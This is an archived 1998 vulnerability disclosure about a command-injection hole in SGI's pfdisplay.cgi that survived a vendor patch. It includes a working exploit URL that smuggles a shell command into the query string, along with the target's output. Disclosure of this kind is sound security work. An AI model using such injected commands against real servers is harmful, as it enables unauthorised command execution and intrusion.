Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: sgipfd~1.txt

Sgi pfdisplay2 CGI holes

Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Subject: perfomer_tools again


    There is already a patch from SGI to the pfdispaly.cgi
    '../..' bug.

    But it seems it fixes only that problem, without checking
    the rest of the code for similar vulnerabilities, so even
    after patch 3018 (04/01/98) you can try:

    $ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'

    uname -a\| file

    IRIX victim 6.2 03131015 IP22


$ lynx -dump \

    (You probably will notice this exploit is similar to that
    one on 'wrap'; it's nice to find that sometimes reusing
    code does work)

    The fix is easy (for this particular problem); so it's left
    to the reader.
    Anyway, if you're using SGI cgi's you should consider
    limiting the access to your domain...

    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH